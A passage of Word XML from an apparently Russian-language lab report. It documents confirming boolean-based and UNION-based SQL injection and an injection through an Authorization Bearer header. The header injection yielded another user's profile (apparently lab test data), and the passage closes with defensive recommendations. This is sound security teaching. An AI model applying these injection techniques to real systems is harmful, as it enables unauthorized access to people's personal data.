        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>category</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: истинное условие</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E57A2B0" w14:textId="77777777" w:rsidR="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
      <w:pPr>
        <w:pStyle w:val="af5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D2D4916" wp14:editId="6D59983F">
            <wp:extent cx="5832000" cy="952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_Boolean_based_SQLi_category_.jpg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5832000" cy="952396"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="23090072" w14:textId="77777777" w:rsidR="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок 14 – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Boolean-based</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SQLi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>category</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: ложное условие</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B62EC55" w14:textId="77777777" w:rsidR="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
      <w:pPr>
        <w:pStyle w:val="af5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21329F20" wp14:editId="2E0F5A61">
            <wp:extent cx="5832000" cy="13934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5_UNION_based_SQLi_category.jpg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5832000" cy="1393453"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D114755" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Рисунок</w:t>
      </w:r>
      <w:r w:rsidRPr="00223005">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 15 – UNION-based SQLi </w:t>
      </w:r>
      <w:r>
        <w:t>в</w:t>
      </w:r>
      <w:r w:rsidRPr="00223005">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>параметре</w:t>
      </w:r>
      <w:r w:rsidRPr="00223005">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> category</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AEA422C" w14:textId="77777777" w:rsidR="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">В параметре </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>category</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> сначала была подтверждена </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>boolean-based</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>: истинное условие вернуло список товаров, а ложное условие вернуло пустой массив. Затем был подтвержден UNION-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>based</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> вариант, так как в JSON-ответе появилась искусственно внедренная строка товара.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F977F6" w14:textId="77777777" w:rsidR="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Дополнительно была проверена ручка GET /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>profile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, использующая заголовок </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Authorization</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Bearer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>login</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> без обычных пробелов позволил получить профиль другого пользователя, что подтвердило </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> в заголовке </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">авторизации. В отчете результат фиксируется в таблице, так как соответствующий ответ был сохранен </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>текстово</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> в ходе работы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787BFA72" w14:textId="77777777" w:rsidR="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
      <w:pPr>
        <w:pStyle w:val="ab"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Таблица 17 – Профиль, полученный через </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SQLi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Authorization</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Bearer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af4"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2835"/>
        <w:gridCol w:w="7060"/>
      </w:tblGrid>
      <w:tr w:rsidR="00223005" w14:paraId="0E4BD4F1" w14:textId="77777777" w:rsidTr="00223005">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4743DEB3" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Поле профиля</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7060" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="11C35977" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Значение, полученное через </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Bearer</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>SQLi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00223005" w14:paraId="192C506A" w14:textId="77777777" w:rsidTr="00223005">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0E34E98F" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>username</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7060" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1EF0DBC8" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>dinner_employee@gmail.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00223005" w14:paraId="5FEBECD9" w14:textId="77777777" w:rsidTr="00223005">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5415B44B" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7060" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5FB28D84" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>Михайлова Валентина Архиповна</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00223005" w14:paraId="6CDF9A94" w14:textId="77777777" w:rsidTr="00223005">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="78EA303F" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>birthDate</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7060" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4B49E4E9" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>Wed</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">, 23 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>Mar</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> 1949 00:00:00 GMT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00223005" w14:paraId="003E9B72" w14:textId="77777777" w:rsidTr="00223005">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="593A1B19" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>address</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7060" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="252E6753" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">п. Подольск, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>алл</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>. Энтузиастов, д. 93 к. 6/4, 519409</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00223005" w14:paraId="05806DCF" w14:textId="77777777" w:rsidTr="00223005">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7CDE120B" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>phone</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7060" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6E672196" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>+7 (777) 289-3235</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2B014A7C" w14:textId="77777777" w:rsidR="00223005" w:rsidRDefault="00223005" w:rsidP="00223005"/>
    <w:p w14:paraId="6B9337EF" w14:textId="77777777" w:rsidR="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
      <w:pPr>
        <w:pStyle w:val="af5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E0B0738" wp14:editId="2820A9DD">
            <wp:extent cx="5832000" cy="31149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6_.jpg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5832000" cy="3114974"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D5B135" w14:textId="77777777" w:rsidR="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:t>Рисунок 16 – Статус лабораторной работы после сдачи ответа</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FBE896" w14:textId="49B929F4" w:rsidR="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t>Меры защиты от обнаруженных уязвимостей</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C16B463" w14:textId="27376839" w:rsidR="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Основная причина найденных уязвимостей — динамическая сборка SQL-запросов из пользовательского ввода. Для защиты необходимо заменить такие запросы на параметризованные. Также необходимо изменить подход к авторизации, отключить </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>debug</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>-режим и ограничить права пользователя БД.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A61805" w14:textId="65F42BF7" w:rsidR="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63478CC1" w14:textId="4AEFA2C7" w:rsidR="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66447DE3" w14:textId="77777777" w:rsidR="00223005" w:rsidRDefault="00223005" w:rsidP="00223005"/>
    <w:p w14:paraId="5E12F109" w14:textId="77777777" w:rsidR="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
      <w:pPr>
        <w:pStyle w:val="ab"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Таблица 18 – Рекомендации по защите</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af4"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2835"/>
        <w:gridCol w:w="2835"/>
        <w:gridCol w:w="4225"/>
      </w:tblGrid>
      <w:tr w:rsidR="00223005" w14:paraId="481900AA" w14:textId="77777777" w:rsidTr="00223005">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="17B5D385" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Обнаруженная проблема</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="35804259" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Риск</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4225" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="147E308B" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Мера защиты</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00223005" w14:paraId="5CFD9DCA" w14:textId="77777777" w:rsidTr="00223005">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="023B4E22" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Конкатенация </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>username</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>password</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> в SQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
